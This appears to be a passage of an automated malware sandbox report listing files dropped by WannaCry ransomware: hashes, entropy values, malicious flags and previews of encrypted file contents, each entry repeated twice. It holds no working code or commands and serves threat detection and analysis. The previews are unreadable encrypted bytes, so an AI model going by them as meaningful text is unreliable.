                                                                              MD5:746B2752D8C7B77DD3FF78882E29FE5D
                                                                              SHA1:45D2BD139358CEC450B553E5029384BB1390E03F
                                                                              SHA-256:097DF38E8DC8FABA016FB32BF01C3FA31B6F62B79C65B595BB1BAACE468C73FE
                                                                              SHA-512:AB46E2188C8CA1340A585AF63377E2C93DCEBD125B38EB356A9A6718C3992FFCD3BA0AFCCAE63A41995E381FF5C575CD778BC8ADAB462BB4A06D4C713B38870C
                                                                              Malicious:true
                                                                              Preview:WANACRY!......Wn\0LN....e...{p.uJU..0..1....HU4>#....1a.d_.......k....:...Y.Q..-.4d{...g,#..v..{s&f.v..R(q..y.v..mI.+.S_j.|4....Yn.c...w.3.r...,.|.mN... .bHY.....*#Uz?.+.d.x.u1.u....N%..n....'..L...\Ba$..?.#.3*.....y]#...........).F......C"7.^...*D.}/y.O.H.....Q......O.;J..}..QG....{v.......w3...[PUS..p.......'..|j..:....rq.....=g..xU...CO5.n.?i...........e....K:....%J......6.hgB.....D.-..61.Bd...U..9q..U'N...c[f`.Q..!..I......J.0...*s.J..m.DA.`...ch..i......g.UWJ....l....._f...g...V..88.2..j..ix.u.....I..A.t..-.....>.....Q..KXj.v.J".y..Hn.K(]..l...M..k.59X:n.$..j.(..l....%$....F..!..9.. ..=x......\..!0.._Mr.c..........>NK..d.....?..?..$"....c..9..e...?...-.,.Q|z.....;B....y..sC.[M..%....4y^'...0j.)J@W...h..<.[]gQi...(...]..4".......q..u..0J....x.3..Y.eq;C(uR....%v.L...b..n.t..........4^PO.eHN..W.F....1)O.?5..tA`.S....!...o.>.`/.,.|.$..%.G...5R."..HX...|...<.(..P@6.....NO.Q..Q...M.7...Q*\J...'...."..........$.O.).2..z.......^f.MdZ-0....-S.S.8..$v..{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):217800
                                                                              Entropy (8bit):7.999145620529258
                                                                              Encrypted:true
                                                                              SSDEEP:3072:TFGHG0An5ARPOHfKm/hS9pPT4AQ4Bk2uzNsPi+N+vlOEVi+dBr/PLDRLnC:eAn5ABIKmJ0GAWfzNs+wlizXRjC
                                                                              MD5:746B2752D8C7B77DD3FF78882E29FE5D
                                                                              SHA1:45D2BD139358CEC450B553E5029384BB1390E03F
                                                                              SHA-256:097DF38E8DC8FABA016FB32BF01C3FA31B6F62B79C65B595BB1BAACE468C73FE
                                                                              SHA-512:AB46E2188C8CA1340A585AF63377E2C93DCEBD125B38EB356A9A6718C3992FFCD3BA0AFCCAE63A41995E381FF5C575CD778BC8ADAB462BB4A06D4C713B38870C
                                                                              Malicious:true
                                                                              Preview:WANACRY!......Wn\0LN....e...{p.uJU..0..1....HU4>#....1a.d_.......k....:...Y.Q..-.4d{...g,#..v..{s&f.v..R(q..y.v..mI.+.S_j.|4....Yn.c...w.3.r...,.|.mN... .bHY.....*#Uz?.+.d.x.u1.u....N%..n....'..L...\Ba$..?.#.3*.....y]#...........).F......C"7.^...*D.}/y.O.H.....Q......O.;J..}..QG....{v.......w3...[PUS..p.......'..|j..:....rq.....=g..xU...CO5.n.?i...........e....K:....%J......6.hgB.....D.-..61.Bd...U..9q..U'N...c[f`.Q..!..I......J.0...*s.J..m.DA.`...ch..i......g.UWJ....l....._f...g...V..88.2..j..ix.u.....I..A.t..-.....>.....Q..KXj.v.J".y..Hn.K(]..l...M..k.59X:n.$..j.(..l....%$....F..!..9.. ..=x......\..!0.._Mr.c..........>NK..d.....?..?..$"....c..9..e...?...-.,.Q|z.....;B....y..sC.[M..%....4y^'...0j.)J@W...h..<.[]gQi...(...]..4".......q..u..0J....x.3..Y.eq;C(uR....%v.L...b..n.t..........4^PO.eHN..W.F....1)O.?5..tA`.S....!...o.>.`/.,.|.$..%.G...5R."..HX...|...<.(..P@6.....NO.Q..Q...M.7...Q*\J...'...."..........$.O.).2..z.......^f.MdZ-0....-S.S.8..$v..{
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1393005043834075
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEClbNhk6676V9u/ix3iSYQBAd26qYUHaIShPqvCBQf/8/+/:bkEC5zDm/83+Q+2BYvSvCMEe
                                                                              MD5:87084E758B4695A3EB6E57314A46F7EC
                                                                              SHA1:FC4F1FA66ADD8A6BB603083B2930CA4998902FA5
                                                                              SHA-256:7D8AFE8277F59936C3AE1006F7695D859763B9BE12D97DA3B8BDBA71CC8149B8
                                                                              SHA-512:4AD889F82FFB5D8064ABA440D89EEC2C0BC5FFE86DA1F250342DCE18BC5A146D49654B911E7BAD018F36FD20D0F693D276F474B55D7F971B7854D55AA6D6AE45
                                                                              Malicious:false
                                                                              Preview:WANACRY!....f...g.]t.@..\...z..K.-.. .|.{.D.jG.3....X0..+....s..v.a.a..f7..B#.....}C...1......D].h...L...6>..u.#.8q...iI.{..............i.u.}n..../+-Dm..&ze.{W...n.jv.i..........Ki..X..]Fc..Fo.9.>q.s{{y...c"..=3..2......,.!.Q.4C9..f..n......0..X....:.,'.o.............-.z..l.-s.A)D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.1393005043834075
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEClbNhk6676V9u/ix3iSYQBAd26qYUHaIShPqvCBQf/8/+/:bkEC5zDm/83+Q+2BYvSvCMEe
                                                                              MD5:87084E758B4695A3EB6E57314A46F7EC
                                                                              SHA1:FC4F1FA66ADD8A6BB603083B2930CA4998902FA5
                                                                              SHA-256:7D8AFE8277F59936C3AE1006F7695D859763B9BE12D97DA3B8BDBA71CC8149B8
                                                                              SHA-512:4AD889F82FFB5D8064ABA440D89EEC2C0BC5FFE86DA1F250342DCE18BC5A146D49654B911E7BAD018F36FD20D0F693D276F474B55D7F971B7854D55AA6D6AE45
                                                                              Malicious:false
                                                                              Preview:WANACRY!....f...g.]t.@..\...z..K.-.. .|.{.D.jG.3....X0..+....s..v.a.a..f7..B#.....}C...1......D].h...L...6>..u.#.8q...iI.{..............i.u.}n..../+-Dm..&ze.{W...n.jv.i..........Ki..X..]Fc..Fo.9.>q.s{{y...c"..=3..2......,.!.Q.4C9..f..n......0..X....:.,'.o.............-.z..l.-s.A)D.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.106249161753767
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEs24u+vwIbIehHEeFLD8+J7D6MCdXtsyof8Dn:bkESu+vZhHEeRdlFqXe8n
                                                                              MD5:539B2E6108D63C2CF0FFABE47746E075
                                                                              SHA1:1802D18B66E13B8FB770F9AB215A26B81253F50A
                                                                              SHA-256:531DF38DC1491975153B2568B738D27AF70440B6B089CF69B03845624C161BE3
                                                                              SHA-512:D03EF1AA56FCFC4E7B4F85B36884EF16A931B146EC89EE69D464303EA40DBC99D57400483CF166B85146CB04B242182E29EDAA5613C672D12F86698F6BA471A8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....\.@<I..~.o."'di^.=.. .....{..#q*1.a+.x+$.(...B..b.......N.@..I@#q_..j .)2.xEMR......]._8QU.,P. E..t.^.3;..zR...B.....I#...H.[...Y...@...y...*b.....i.o8H..7J....Z...{..7.M....*m..a....$.}.}..;+_....2C.]L...j..$.....dM.$.`.].G+.j{....e.O.D@WHR...............V.)q.9H......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.106249161753767
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEs24u+vwIbIehHEeFLD8+J7D6MCdXtsyof8Dn:bkESu+vZhHEeRdlFqXe8n
                                                                              MD5:539B2E6108D63C2CF0FFABE47746E075
                                                                              SHA1:1802D18B66E13B8FB770F9AB215A26B81253F50A
                                                                              SHA-256:531DF38DC1491975153B2568B738D27AF70440B6B089CF69B03845624C161BE3
                                                                              SHA-512:D03EF1AA56FCFC4E7B4F85B36884EF16A931B146EC89EE69D464303EA40DBC99D57400483CF166B85146CB04B242182E29EDAA5613C672D12F86698F6BA471A8
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....\.@<I..~.o."'di^.=.. .....{..#q*1.a+.x+$.(...B..b.......N.@..I@#q_..j .)2.xEMR......]._8QU.,P. E..t.^.3;..zR...B.....I#...H.[...Y...@...y...*b.....i.o8H..7J....Z...{..7.M....*m..a....$.}.}..;+_....2C.]L...j..$.....dM.$.`.].G+.j{....e.O.D@WHR...............V.)q.9H......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115128
                                                                              Entropy (8bit):7.998204278655181
                                                                              Encrypted:true
                                                                              SSDEEP:3072:c5HHQDQf7JqzlWZDDzTxmL3aK0z3e1idHGZneWB:iHHQDQjJolWhNY5keilGZeWB
                                                                              MD5:7E2FCC0A58B3A3C8A8EDEB0E8ED2A9FC
                                                                              SHA1:A1C8CB9D242CC6240CE7DEE8557D13C8BFC5BC9F
                                                                              SHA-256:F13ADB349C91382ADADABF7918BD75BE870A244CB0EEE355D228A9D2A72E4C76
                                                                              SHA-512:6F76DA25C202749A720472A518E3E014FE6A92BCA156288D5877C1B702219E9DCE79491F3940DDCCD92207078522D7CF2B296E6D10A4EA66FB010CC89653237E
                                                                              Malicious:true
                                                                              Preview:WANACRY!........h..q.[p.7.^.}.F;....."9....A%$:.B..io.DH..U..;I.|.;v.{.*.n\*.......:y........)..?^...S.A...[.....(.:.Fs..%.o.W....v...`...^.@.....&Yv.o.R..0R.$-.....@.]... .c.=.3.tF9..q...J(./...MO.U.7...lq..yL..3...y..L...4..b.#.N...I...5g..+...AV.=....?............cM.....4.....#I...7..l..F.... @$..n3.P.x.$5e......4..NC..;..8....Y...;Q.R...;.Y...,........}E..Vgk.)...A.....v..\....o..SD.h:Vrr."..R.g.~x..~...K.l^.c.C.,....*.....7..x..c5...W..m....oi.g....U\[v]iWU...ga..0.H..bN....w}.y.'.-.X]k`T....!.v...5f..W.`..9U^d!5..(..,1.H<.Q*n.._?.k....H....W.l..7...gY'.........2<...uw)..A........h.-...y..)...R...H.....7.M....j......:..{=...~.qvdPr..G..".]t...@..(.2;.8..8'..OZJ.=...4..e..0..S....."...`W.G..N.._T^jA..m.6....j..&;..SCJ...aw.U.<..Br.G..d.....e.`NW@<..]n...2. ..YS...ff.k...x....m]^l..U..qcwL..$...H\....s%...N...]..>.T!U.qnJ.."F9. .z..uA.{.B........F....m..F..o...H...0P]...f.......(...y.'P.;... M/d...].T..H.2Q.1../....E.?..h....O|@1...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115128
                                                                              Entropy (8bit):7.998204278655181
                                                                              Encrypted:true
                                                                              SSDEEP:3072:c5HHQDQf7JqzlWZDDzTxmL3aK0z3e1idHGZneWB:iHHQDQjJolWhNY5keilGZeWB
                                                                              MD5:7E2FCC0A58B3A3C8A8EDEB0E8ED2A9FC
                                                                              SHA1:A1C8CB9D242CC6240CE7DEE8557D13C8BFC5BC9F
                                                                              SHA-256:F13ADB349C91382ADADABF7918BD75BE870A244CB0EEE355D228A9D2A72E4C76
                                                                              SHA-512:6F76DA25C202749A720472A518E3E014FE6A92BCA156288D5877C1B702219E9DCE79491F3940DDCCD92207078522D7CF2B296E6D10A4EA66FB010CC89653237E
                                                                              Malicious:true
                                                                              Preview:WANACRY!........h..q.[p.7.^.}.F;....."9....A%$:.B..io.DH..U..;I.|.;v.{.*.n\*.......:y........)..?^...S.A...[.....(.:.Fs..%.o.W....v...`...^.@.....&Yv.o.R..0R.$-.....@.]... .c.=.3.tF9..q...J(./...MO.U.7...lq..yL..3...y..L...4..b.#.N...I...5g..+...AV.=....?............cM.....4.....#I...7..l..F.... @$..n3.P.x.$5e......4..NC..;..8....Y...;Q.R...;.Y...,........}E..Vgk.)...A.....v..\....o..SD.h:Vrr."..R.g.~x..~...K.l^.c.C.,....*.....7..x..c5...W..m....oi.g....U\[v]iWU...ga..0.H..bN....w}.y.'.-.X]k`T....!.v...5f..W.`..9U^d!5..(..,1.H<.Q*n.._?.k....H....W.l..7...gY'.........2<...uw)..A........h.-...y..)...R...H.....7.M....j......:..{=...~.qvdPr..G..".]t...@..(.2;.8..8'..OZJ.=...4..e..0..S....."...`W.G..N.._T^jA..m.6....j..&;..SCJ...aw.U.<..Br.G..d.....e.`NW@<..]n...2. ..YS...ff.k...x....m]^l..U..qcwL..$...H\....s%...N...]..>.T!U.qnJ.."F9. .z..uA.{.B........F....m..F..o...H...0P]...f.......(...y.'P.;... M/d...].T..H.2Q.1../....E.?..h....O|@1...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115128
                                                                              Entropy (8bit):7.998389857503888
                                                                              Encrypted:true
                                                                              SSDEEP:3072:2qMCwtcyd6ApogoaPk2/jdO/iUTkVAkP9J+:NwtFbiaP17S
                                                                              MD5:BDC66FE74D7C37257F5A9A88B6204DA4
                                                                              SHA1:63E71C3BB559194BB46310206F423A7119171B64
                                                                              SHA-256:E42833A8535F08B09007D6AA03B446DBFE56A6D8488F83E17D44EDE3EEDE6111
                                                                              SHA-512:5E61326C18F5218E6D0CAD46D3DE422807892EC37ECBD7DFD68BA9A9EBF773A2651B7960ED25F26005457648D06C88BB4B8FE8CCB721273E7A4475061DDBF6C7
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....1s^.f...D...,.0.H=.T8.;..iP..../........+.........y.D.o{!.....e...?QJ.*........_.......*..9.S...g....el..(.3..W....a<.qx.lZ.6...r...-..Qq,.....(.j.e..1....e.l.`/....=.a..[K.rbS.B......9,.j..of../...3.M.1..K.k..B....f....6..l.._xKA.....\. .."..3:................&.9.N...@...U.I.r..Cc.+(.....}.... E`.$3Z....m..if,7{.&.C..O4...(..j4.yX.c?.K...A1..5.n.J...c.A..>.@....=......@.s.\. ...O......J..+...U0...c.rd.X...0.QZ"...X.w.......b.5.~.".)iH.....>$h.5...`.c.........yV.L..VC,..Iqc.@.Jv...D..?../.j....~z..[.?..9.D+.k1W..._......6r........v=r......[....z..YI.R....#.....bj..Z..iv.M...v?.N..3.q..E.^Z~aL.v........%aTgV.....,.3..}..L..r(....I.B.......].OW....m.....:...4Z.8M...c..."./.,.V..)..}ZSMO.s}.9.X<o...k..b.....S.}.w....Uc..C.w-..'&..&V..(.c0x.....jV...}....ud4...{...M.(<`...fL+.p-t....i.. .?..5.[.H...:.".b.k... ~\.@......q..e)g1..`.=B.N...!.....[...u.....+IN.g.`..o...4D."99.........:.F...w.'..'..WCVK..SAK.FC.q....y.2)....f....wW..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115128
                                                                              Entropy (8bit):7.998389857503888
                                                                              Encrypted:true
                                                                              SSDEEP:3072:2qMCwtcyd6ApogoaPk2/jdO/iUTkVAkP9J+:NwtFbiaP17S
                                                                              MD5:BDC66FE74D7C37257F5A9A88B6204DA4
                                                                              SHA1:63E71C3BB559194BB46310206F423A7119171B64
                                                                              SHA-256:E42833A8535F08B09007D6AA03B446DBFE56A6D8488F83E17D44EDE3EEDE6111
                                                                              SHA-512:5E61326C18F5218E6D0CAD46D3DE422807892EC37ECBD7DFD68BA9A9EBF773A2651B7960ED25F26005457648D06C88BB4B8FE8CCB721273E7A4475061DDBF6C7
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....1s^.f...D...,.0.H=.T8.;..iP..../........+.........y.D.o{!.....e...?QJ.*........_.......*..9.S...g....el..(.3..W....a<.qx.lZ.6...r...-..Qq,.....(.j.e..1....e.l.`/....=.a..[K.rbS.B......9,.j..of../...3.M.1..K.k..B....f....6..l.._xKA.....\. .."..3:................&.9.N...@...U.I.r..Cc.+(.....}.... E`.$3Z....m..if,7{.&.C..O4...(..j4.yX.c?.K...A1..5.n.J...c.A..>.@....=......@.s.\. ...O......J..+...U0...c.rd.X...0.QZ"...X.w.......b.5.~.".)iH.....>$h.5...`.c.........yV.L..VC,..Iqc.@.Jv...D..?../.j....~z..[.?..9.D+.k1W..._......6r........v=r......[....z..YI.R....#.....bj..Z..iv.M...v?.N..3.q..E.^Z~aL.v........%aTgV.....,.3..}..L..r(....I.B.......].OW....m.....:...4Z.8M...c..."./.,.V..)..}ZSMO.s}.9.X<o...k..b.....S.}.w....Uc..C.w-..'&..&V..(.c0x.....jV...}....ud4...{...M.(<`...fL+.p-t....i.. .?..5.[.H...:.".b.k... ~\.@......q..e)g1..`.=B.N...!.....[...u.....+IN.g.`..o...4D."99.........:.F...w.'..'..WCVK..SAK.FC.q....y.2)....f....wW..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):114280
                                                                              Entropy (8bit):7.998531380433508
                                                                              Encrypted:true
                                                                              SSDEEP:3072:EYZepCXvIR1GzBcwtJH2V3Ahx6HFLmP2fYYL:nZ2YwR1Gz+PAr6HFQ2Q6
                                                                              MD5:6943E5E013FF0D8B1B0113C951F3E278
                                                                              SHA1:D11869E90F7C12DD58C69BC5C44DA361113F1B5E
                                                                              SHA-256:E7E0C4382E06AB06498C434BF18941C31F63923CD324B31C0B07A534EDC32A15
                                                                              SHA-512:4318137DE2B67BA037D0DA0DDC6C7581E1ECC4D29E2CA0DF0CF654AE5764080F5DA291F16F26EE76E1D1E290AAF31307CCFD2AE2F85AB25374DCC9DBE29C5B25
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......S..iu.....|W......k4..q.>.aO.@.....t..\...qE.(.k.l@..-Y.:r.t.......).9.H....h4YU"../...B....g.-Q5j..J(..0......#...!<........j.......Z...k.OG"..I.Y.0].....~..uj^..v....\.....]....CP...W.E...'./....n......zn.B...)>.......E-....`..#K4.>&....E........7..6GB.@."..S.\F .X........."0x.....q.a.1.v....uW.N.=^...&]...09..W.Aoze...V>.}....-..Q"Z'.~......Wg/.{o.q...%.Za...B._.47-.G.2..H.7..^..\J.G.~..2.=y..H|...*.......`(IgYC....h.......Xe....9rg*..7.0.l$.#.......U+ oQ....h..#...|1...n.n..Wp.).R4o...y\..mD..$..x2.g+...C..#....Z..S.T2.....nl ...FU.|.m.}bp......E....[..]7.v...?...'.T~p.P32...9.y.1o.....j.Hp.1....='.}I.3.%...v..K`.(-h.+.!....-h.)nZ. .{X.5.h.nP....xB...k.0...3.C...i_D.`9..i)L..A...2....Th.`.V.....t..S.g.......Q..y.....CF..1...5..$M..........g.4=...q..........p...z.",..d..h^r.....@t7Rw.n...*/r'n...V....6O~...c6..E.&S..[...A.!.K...l#y. .l.R=.....v.._.p#9(.?.T..W-....8...P....q.8Z.0.@7...`..xc\..Yj.....+3.n......7j...Ha.X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):114280
                                                                              Entropy (8bit):7.998531380433508
                                                                              Encrypted:true
                                                                              SSDEEP:3072:EYZepCXvIR1GzBcwtJH2V3Ahx6HFLmP2fYYL:nZ2YwR1Gz+PAr6HFQ2Q6
                                                                              MD5:6943E5E013FF0D8B1B0113C951F3E278
                                                                              SHA1:D11869E90F7C12DD58C69BC5C44DA361113F1B5E
                                                                              SHA-256:E7E0C4382E06AB06498C434BF18941C31F63923CD324B31C0B07A534EDC32A15
                                                                              SHA-512:4318137DE2B67BA037D0DA0DDC6C7581E1ECC4D29E2CA0DF0CF654AE5764080F5DA291F16F26EE76E1D1E290AAF31307CCFD2AE2F85AB25374DCC9DBE29C5B25
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......S..iu.....|W......k4..q.>.aO.@.....t..\...qE.(.k.l@..-Y.:r.t.......).9.H....h4YU"../...B....g.-Q5j..J(..0......#...!<........j.......Z...k.OG"..I.Y.0].....~..uj^..v....\.....]....CP...W.E...'./....n......zn.B...)>.......E-....`..#K4.>&....E........7..6GB.@."..S.\F .X........."0x.....q.a.1.v....uW.N.=^...&]...09..W.Aoze...V>.}....-..Q"Z'.~......Wg/.{o.q...%.Za...B._.47-.G.2..H.7..^..\J.G.~..2.=y..H|...*.......`(IgYC....h.......Xe....9rg*..7.0.l$.#.......U+ oQ....h..#...|1...n.n..Wp.).R4o...y\..mD..$..x2.g+...C..#....Z..S.T2.....nl ...FU.|.m.}bp......E....[..]7.v...?...'.T~p.P32...9.y.1o.....j.Hp.1....='.}I.3.%...v..K`.(-h.+.!....-h.)nZ. .{X.5.h.nP....xB...k.0...3.C...i_D.`9..i)L..A...2....Th.`.V.....t..S.g.......Q..y.....CF..1...5..$M..........g.4=...q..........p...z.",..d..h^r.....@t7Rw.n...*/r'n...V....6O~...c6..E.&S..[...A.!.K...l#y. .l.R=.....v.._.p#9(.?.T..W-....8...P....q.8Z.0.@7...`..xc\..Yj.....+3.n......7j...Ha.X.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115080
                                                                              Entropy (8bit):7.99814927078521
                                                                              Encrypted:true
                                                                              SSDEEP:1536:RImHoBNOjWe+GUDf0b/a61QY/Vv9MITGfFy0VOZ5mBXudjQNO36s7W4hr+YpfE/+:mxNOjWe+0jdBdpLQ42Arnf0Egrv+dK6n
                                                                              MD5:A0DE5BB2F6B1C2D04252F233F3501A9C
                                                                              SHA1:7C72D6204F3794D6A3D6DFAF14BD4E88C8284547
                                                                              SHA-256:450974356F51A4360A327DD0103D5288DBC6A941AAA6EDE9D1A811BA5698DC8D
                                                                              SHA-512:2DE7EE259F2AFC15B19E35338D00A00F38403B38ED21459183FB01EF4D6B20F5E8DABD6922213ED91B8697EE35FBB461029534857C89B8B276FAD55F029BF196
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....z.&.......TB..f.c}.qr..^.<.j.H......%Kr..5Y ./o2.y*..h...........$Ph.i.|.Q.....E]..U...M.....7n...G!e....\.U..o..j.y....Q..P.3..._......@...ao...I{k==.F.......{.,7.......t.Av........l.y.U.fm.K.7.~..........i.2.........-Al...Twz...{\.,&H.s.....OT......a..........L.Nfe..&.~..:u...e....2q!NrW..'Q.*..g.\.}"..od.....,.#O.,B).....g.J......n-.!......D.....$b....2..N..;.z.M.....l_m.....@M..7...2..&.E....b<SbPm.|_7.L[.....0s...8.3.j..%....O.jC..H.{9..3{C..{..b1...[:u..+..(@"qrb.T'@a....o.u...W..]q....:...X.....j*F...B!.jJ...2..K......k.y......1..W.g-.K/.r.CQ..f..D...z...e-...1..=|.i...j.....].>{.y.4DP.P..G..%.........F..sp..N...gP.O.K2L..hf.....L+*c..4..i.....L....Tx..v.t.@M.{...L*...X?..K.{l..5....LJx......:...y....k.a"....&.{..K`<..9m......Fr....].E.....#..J.%:...X.!.'gLcl.%..*...h...}.3.Kr.8).{..X.}.{.w!......A..x...l...~^.2.+=F...8....L....._....5.........:r.......&fC.t.[.Sc{..E........>+d....P..;..u....b~.s........n..*.[.).Iy3.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):115080
                                                                              Entropy (8bit):7.99814927078521
                                                                              Encrypted:true
                                                                              SSDEEP:1536:RImHoBNOjWe+GUDf0b/a61QY/Vv9MITGfFy0VOZ5mBXudjQNO36s7W4hr+YpfE/+:mxNOjWe+0jdBdpLQ42Arnf0Egrv+dK6n
                                                                              MD5:A0DE5BB2F6B1C2D04252F233F3501A9C
                                                                              SHA1:7C72D6204F3794D6A3D6DFAF14BD4E88C8284547
                                                                              SHA-256:450974356F51A4360A327DD0103D5288DBC6A941AAA6EDE9D1A811BA5698DC8D
                                                                              SHA-512:2DE7EE259F2AFC15B19E35338D00A00F38403B38ED21459183FB01EF4D6B20F5E8DABD6922213ED91B8697EE35FBB461029534857C89B8B276FAD55F029BF196
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....z.&.......TB..f.c}.qr..^.<.j.H......%Kr..5Y ./o2.y*..h...........$Ph.i.|.Q.....E]..U...M.....7n...G!e....\.U..o..j.y....Q..P.3..._......@...ao...I{k==.F.......{.,7.......t.Av........l.y.U.fm.K.7.~..........i.2.........-Al...Twz...{\.,&H.s.....OT......a..........L.Nfe..&.~..:u...e....2q!NrW..'Q.*..g.\.}"..od.....,.#O.,B).....g.J......n-.!......D.....$b....2..N..;.z.M.....l_m.....@M..7...2..&.E....b<SbPm.|_7.L[.....0s...8.3.j..%....O.jC..H.{9..3{C..{..b1...[:u..+..(@"qrb.T'@a....o.u...W..]q....:...X.....j*F...B!.jJ...2..K......k.y......1..W.g-.K/.r.CQ..f..D...z...e-...1..=|.i...j.....].>{.y.4DP.P..G..%.........F..sp..N...gP.O.K2L..hf.....L+*c..4..i.....L....Tx..v.t.@M.{...L*...X?..K.{l..5....LJx......:...y....k.a"....&.{..K`<..9m......Fr....].E.....#..J.%:...X.!.'gLcl.%..*...h...}.3.Kr.8).{..X.}.{.w!......A..x...l...~^.2.+=F...8....L....._....5.........:r.......&fC.t.[.Sc{..E........>+d....P..;..u....b~.s........n..*.[.).Iy3.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):696888
                                                                              Entropy (8bit):7.999726875940989
                                                                              Encrypted:true
                                                                              SSDEEP:12288:bJf99XZsy5Z3qk/AzRZy+hKc0l3U0Oa2pGZfrmCPUmS+iqbwGCWU1UusX:bd99X++3qFQpU04WDTURqcT7UD
                                                                              MD5:51603DA8504D1AD134405065B2BF8471
                                                                              SHA1:9F6DC1E859AD17F693B5F7CDFC7AB4DF8F0E77E9
                                                                              SHA-256:39D2D8DA30BF3185BB2AA142B86B12C79DD6A04443257C7ECF56FDAC30809C6C
                                                                              SHA-512:B49A0FF1FF1A35E683233D448353CDFC93F04CD4F63E6515FA6AFE77ABC0F13B2E2574FAC14FC8C2C82778093C8717D68C622190EAE40DF996A67BC104B3573C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......sa..:k]c...a}.`.........3Z.90....Z...1@....(.....^.....u.6@......+.|A9...>H...c.=.'...34)..._.m.... ..Z.Co...V.`.?.W{%..'..-..C[.h..V%%..h..;1..M.e.....L...1.TY..=6...xG.*...U.[.F."3..:.Q....r.*.^9._.ersp}...!..p......>.Y.....!......a.q...............:S..A..X....+...%.....4...:...I.e.zHC....4.......-.......Wb...1.....KB...a..J..UA..=6.C.-8.V...>~......I...3...7..o.r.....R.)](..A[.F..o.I../.t.y...y.J..p.........@1S.J........|.I......d.%6.|..i ..HR.....'.qLb|...g......B\G..k....-WF.......mW.SjoO..z:.m;b-..y`...p.....R.h.=.c.i._..v......Cg.i.3._{u.Sy..F`8.=.....t.@N...Y..(..w......fF&.I.N..".v41...y..\...#4..l..4.n.9p..\.,..Yyb..K6.P.L4&..}./......."O...>...X=?.VV|..-'..>....(..N.p. ...O.Y.rr_.....6w...&.p].c.04RR...:|.M>.5.3.-U.&.....N...h2.Z.O.._^\H.......fb........m...._...a[.....>....,.t.~..pob...p....:}T......n...$).-.x(..Y.M.....6.R......../#...~.[.)./.....K...).A.T....O..:&G..lp.....5.aY.q+i.{....&.....[v2_t...e5.5.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):696888
                                                                              Entropy (8bit):7.999726875940989
                                                                              Encrypted:true
                                                                              SSDEEP:12288:bJf99XZsy5Z3qk/AzRZy+hKc0l3U0Oa2pGZfrmCPUmS+iqbwGCWU1UusX:bd99X++3qFQpU04WDTURqcT7UD
                                                                              MD5:51603DA8504D1AD134405065B2BF8471
                                                                              SHA1:9F6DC1E859AD17F693B5F7CDFC7AB4DF8F0E77E9
                                                                              SHA-256:39D2D8DA30BF3185BB2AA142B86B12C79DD6A04443257C7ECF56FDAC30809C6C
                                                                              SHA-512:B49A0FF1FF1A35E683233D448353CDFC93F04CD4F63E6515FA6AFE77ABC0F13B2E2574FAC14FC8C2C82778093C8717D68C622190EAE40DF996A67BC104B3573C
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......sa..:k]c...a}.`.........3Z.90....Z...1@....(.....^.....u.6@......+.|A9...>H...c.=.'...34)..._.m.... ..Z.Co...V.`.?.W{%..'..-..C[.h..V%%..h..;1..M.e.....L...1.TY..=6...xG.*...U.[.F."3..:.Q....r.*.^9._.ersp}...!..p......>.Y.....!......a.q...............:S..A..X....+...%.....4...:...I.e.zHC....4.......-.......Wb...1.....KB...a..J..UA..=6.C.-8.V...>~......I...3...7..o.r.....R.)](..A[.F..o.I../.t.y...y.J..p.........@1S.J........|.I......d.%6.|..i ..HR.....'.qLb|...g......B\G..k....-WF.......mW.SjoO..z:.m;b-..y`...p.....R.h.=.c.i._..v......Cg.i.3._{u.Sy..F`8.=.....t.@N...Y..(..w......fF&.I.N..".v41...y..\...#4..l..4.n.9p..\.,..Yyb..K6.P.L4&..}./......."O...>...X=?.VV|..-'..>....(..N.p. ...O.Y.rr_.....6w...&.p].c.04RR...:|.M>.5.3.-U.&.....N...h2.Z.O.._^\H.......fb........m...._...a[.....>....,.t.~..pob...p....:}T......n...$).-.x(..Y.M.....6.R......../#...~.[.)./.....K...).A.T....O..:&G..lp.....5.aY.q+i.{....&.....[v2_t...e5.5.
